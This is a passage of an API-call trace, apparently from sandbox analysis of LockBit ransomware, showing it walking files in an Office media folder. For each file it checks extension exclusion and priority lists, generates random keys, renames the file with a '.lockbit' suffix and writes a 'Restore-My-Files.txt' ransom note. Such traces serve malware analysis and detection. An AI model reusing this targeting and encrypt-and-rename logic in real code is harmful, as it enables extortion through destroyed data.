(lpString1=".idx", lpString2=".WAV") returned -1 [0196.938] lstrcmpiW (lpString1=".sys", lpString2=".WAV") returned -1 [0196.938] lstrcmpiW (lpString1=".hlp", lpString2=".WAV") returned -1 [0196.938] lstrcmpiW (lpString1=".ico", lpString2=".WAV") returned -1 [0196.938] lstrcmpiW (lpString1=".lnk", lpString2=".WAV") returned -1 [0196.938] lstrcmpiW (lpString1=".rdp", lpString2=".WAV") returned -1 [0196.938] lstrcmpiW (lpString1=".lockbit", lpString2=".WAV") returned -1 [0196.938] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0214098.WAV") returned 1 [0196.938] lstrcmpiW (lpString1="ntldr", lpString2="J0214098.WAV") returned 1 [0196.938] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0214098.WAV") returned 1 [0196.938] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0214098.WAV") returned -1 [0196.938] lstrcmpiW (lpString1="autorun.inf", lpString2="J0214098.WAV") returned -1 [0196.938] lstrcmpiW (lpString1="thumbs.db", lpString2="J0214098.WAV") returned 1 [0196.938] lstrcmpiW (lpString1="iconcache.db", lpString2="J0214098.WAV") returned -1 [0196.938] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0196.938] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0214098.WAV") returned=".WAV" [0196.938] lstrcmpiW (lpString1=".rar", lpString2=".WAV") returned -1 [0196.938] lstrcmpiW (lpString1=".zip", lpString2=".WAV") returned 1 [0196.938] lstrcmpiW (lpString1=".7z", lpString2=".WAV") returned -1 [0196.938] lstrcmpiW (lpString1=".ckp", lpString2=".WAV") returned -1 [0196.938] lstrcmpiW (lpString1=".dacpac", lpString2=".WAV") returned -1 [0196.938] lstrcmpiW (lpString1=".db", lpString2=".WAV") returned -1 [0196.938] lstrcmpiW (lpString1=".db-shm", lpString2=".WAV") returned -1 [0196.939] lstrcmpiW (lpString1=".db-wal", lpString2=".WAV") returned -1 [0196.939] lstrcmpiW (lpString1=".db3", lpString2=".WAV") returned -1 [0196.939] lstrcmpiW (lpString1=".dbf", lpString2=".WAV") returned -1 [0196.939] lstrcmpiW (lpString1=".dbc", lpString2=".WAV") returned -1 [0196.939] lstrcmpiW (lpString1=".dbs", lpString2=".WAV") returned -1 [0196.939] lstrcmpiW (lpString1=".dbt", lpString2=".WAV") returned -1 [0196.939] lstrcmpiW (lpString1=".dbv", lpString2=".WAV") returned -1 [0196.939] lstrcmpiW (lpString1=".frm", lpString2=".WAV") returned -1 [0196.939] lstrcmpiW (lpString1=".mdf", lpString2=".WAV") returned -1 [0196.939] lstrcmpiW (lpString1=".mrg", lpString2=".WAV") returned -1 [0196.939] lstrcmpiW (lpString1=".mwb", lpString2=".WAV") returned -1 [0196.939] lstrcmpiW (lpString1=".myd", lpString2=".WAV") returned -1 [0196.939] lstrcmpiW (lpString1=".ndf", lpString2=".WAV") returned -1 [0196.939] lstrcmpiW (lpString1=".qry", lpString2=".WAV") returned -1 [0196.939] lstrcmpiW (lpString1=".sdb", lpString2=".WAV") returned -1 [0196.939] lstrcmpiW (lpString1=".sdf", lpString2=".WAV") returned -1 [0196.939] lstrcmpiW (lpString1=".sql", lpString2=".WAV") returned -1 [0196.939] lstrcmpiW (lpString1=".sqlite", lpString2=".WAV") returned -1 [0196.939] lstrcmpiW (lpString1=".sqlite3", lpString2=".WAV") returned -1 [0196.939] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WAV") returned -1 [0196.939] lstrcmpiW (lpString1=".tmd", lpString2=".WAV") returned -1 [0196.939] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0214098.WAV.lockbit") returned 70 [0196.939] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0214098.WAV" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0214098.wav"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0196.942] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0196.942] malloc (_Size=0x40068) returned 0x1ff1e60 [0196.942] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=26810) returned 1 [0196.942] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.943] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.943] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0196.943] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.943] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.943] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0196.943] ReadFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0196.955] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0214098.WAV.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0214098.WAV.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0196.955] malloc (_Size=0xa2) returned 0x1fa2ed8 [0196.955] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0xc0000008 [0196.955] free (_Block=0x1fa2ed8) [0196.955] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0214098.WAV" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0196.955] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0196.955] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0196.955] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32ba5a00, ftCreationTime.dwHighDateTime=0x1be1b5b, ftLastAccessTime.dwLowDateTime=0xbd512fa0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x32ba5a00, ftLastWriteTime.dwHighDateTime=0x1be1b5b, nFileSizeHigh=0x0, nFileSizeLow=0x1d3a, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0215086.WMF", cAlternateFileName="")) returned 1 [0196.955] lstrcmpiW (lpString1=".", lpString2="J0215086.WMF") returned -1 [0196.955] lstrcmpiW (lpString1="..", lpString2="J0215086.WMF") returned -1 [0196.955] PathFindExtensionW (pszPath="J0215086.WMF") returned=".WMF" [0196.955] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0196.955] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0196.955] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0196.955] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0196.955] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0196.955] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0196.955] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0196.955] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0196.955] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0196.956] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0196.956] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0196.956] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0196.956] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0196.956] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0196.956] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0196.956] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0196.956] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0196.956] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0196.956] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0196.956] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0196.956] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0196.956] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0196.956] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0196.956] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0196.956] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0196.956] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0196.956] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0196.956] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0196.956] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0196.956] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0196.956] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0196.956] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0196.956] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0196.956] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0196.957] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0196.957] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0196.957] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0196.957] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0196.957] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0196.957] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0196.957] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0196.957] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0196.957] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0196.957] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0196.957] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0196.957] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0196.957] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0196.957] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0215086.WMF") returned 1 [0196.957] lstrcmpiW (lpString1="ntldr", lpString2="J0215086.WMF") returned 1 [0196.957] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0215086.WMF") returned 1 [0196.957] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0215086.WMF") returned -1 [0196.957] lstrcmpiW (lpString1="autorun.inf", lpString2="J0215086.WMF") returned -1 [0196.957] lstrcmpiW (lpString1="thumbs.db", lpString2="J0215086.WMF") returned 1 [0196.957] lstrcmpiW (lpString1="iconcache.db", lpString2="J0215086.WMF") returned -1 [0196.957] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0196.957] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0215086.WMF") returned=".WMF" [0196.957] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0196.957] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0196.957] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0196.957] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0196.957] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0196.957] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0196.958] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0196.958] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0196.958] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0196.958] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0196.958] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0196.958] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0196.958] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0196.958] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0196.958] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0196.958] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0196.958] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0196.958] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0196.958] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0196.958] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0196.958] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0196.958] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0196.958] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0196.958] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0196.958] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0196.958] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0196.958] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0196.958] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0196.958] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0215086.WMF.lockbit") returned 70 [0196.958] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0215086.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0215086.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0196.960] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0196.960] malloc (_Size=0x40068) returned 0x3df0008 [0196.960] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=7482) returned 1 [0196.960] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.961] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.961] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0196.961] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.961] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.961] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0196.961] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0196.966] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0215086.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0215086.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0196.966] malloc (_Size=0xa2) returned 0x1fa2ed8 [0196.967] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0xc0000008 [0196.967] free (_Block=0x1fa2ed8) [0196.967] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0215086.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0196.967] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0196.967] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0196.968] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35c4ec00, ftCreationTime.dwHighDateTime=0x1be6c1a, ftLastAccessTime.dwLowDateTime=0xbd512fa0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x35c4ec00, ftLastWriteTime.dwHighDateTime=0x1be6c1a, nFileSizeHigh=0x0, nFileSizeLow=0x3138, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0216516.WMF", cAlternateFileName="")) returned 1 [0196.968] lstrcmpiW (lpString1=".", lpString2="J0216516.WMF") returned -1 [0196.968] lstrcmpiW (lpString1="..", lpString2="J0216516.WMF") returned -1 [0196.968] PathFindExtensionW (pszPath="J0216516.WMF") returned=".WMF" [0196.968] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0196.968] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0196.968] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0196.968] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0196.968] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0196.968] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0196.968] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0196.968] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0196.968] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0196.968] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0196.968] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0196.968] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0196.968] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0196.968] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0196.968] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0196.968] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0196.968] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0196.969] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0196.969] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0196.969] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0196.969] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0196.969] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0196.969] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0196.969] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0196.969] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0196.969] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0196.969] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0196.969] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0196.969] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0196.969] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0196.969] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0196.969] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0196.969] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0196.969] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0196.969] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0196.969] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0196.969] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0196.969] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0196.969] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0196.969] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0196.969] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0196.969] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0196.970] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0196.970] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0196.970] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0196.970] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0196.970] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0196.970] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0216516.WMF") returned 1 [0196.970] lstrcmpiW (lpString1="ntldr", lpString2="J0216516.WMF") returned 1 [0196.970] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0216516.WMF") returned 1 [0196.970] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0216516.WMF") returned -1 [0196.970] lstrcmpiW (lpString1="autorun.inf", lpString2="J0216516.WMF") returned -1 [0196.970] lstrcmpiW (lpString1="thumbs.db", lpString2="J0216516.WMF") returned 1 [0196.970] lstrcmpiW (lpString1="iconcache.db", lpString2="J0216516.WMF") returned -1 [0196.970] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0196.970] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0216516.WMF") returned=".WMF" [0196.970] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0196.970] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0196.970] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0196.970] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0196.970] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0196.970] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0196.970] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0196.970] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0196.970] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0196.970] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0196.971] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0196.971] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0196.971] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0196.971] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0196.971] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0196.971] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0196.971] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0196.971] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0196.971] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0196.971] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0196.971] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0196.971] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0196.971] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0196.971] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0196.971] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0196.971] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0196.971] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0196.971] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0196.971] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0216516.WMF.lockbit") returned 70 [0196.971] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0216516.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0216516.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0196.974] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0196.974] malloc (_Size=0x40068) returned 0x3df0008 [0196.975] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=12600) returned 1 [0196.975] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.975] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.975] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0196.976] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.976] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.976] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0196.976] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0196.981] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0216516.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0216516.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0196.981] malloc (_Size=0xa2) returned 0x1fa2ed8 [0196.981] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0x0 [0196.982] free (_Block=0x1fa2ed8) [0196.982] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0216516.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0196.983] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0196.983] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft 